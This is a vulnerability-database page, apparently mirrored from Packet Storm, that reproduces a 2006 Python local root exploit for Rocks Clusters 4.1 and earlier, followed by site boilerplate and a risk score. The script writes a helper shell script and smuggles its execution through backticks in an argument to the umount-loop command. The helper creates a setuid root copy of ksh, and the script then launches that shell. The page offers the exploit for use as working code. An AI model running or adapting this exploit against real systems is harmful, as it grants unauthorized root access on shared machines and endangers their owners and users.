Lucene search
K

rocksumountdirty.txt

🗓️ 18 Jul 2006 00:00:00Reported by xavierType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Rocks release version 4.1 local root exploi

Code
`#!/usr/bin/env python  
##############################################################################  
## rocksumountdirty.py: Rocks release <=4.1 local root exploit  
## quick and nasty version of the exploit. make sure the . is writable and  
## you clean up afterwards. ;)  
##  
## coded by: [email protected] [http://xavsec.blogspot.com]  
##############################################################################  
x=__import__('os');c=x.getcwd()  
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))  
print "Rocks Clusters <=4.1 umount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"  
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
21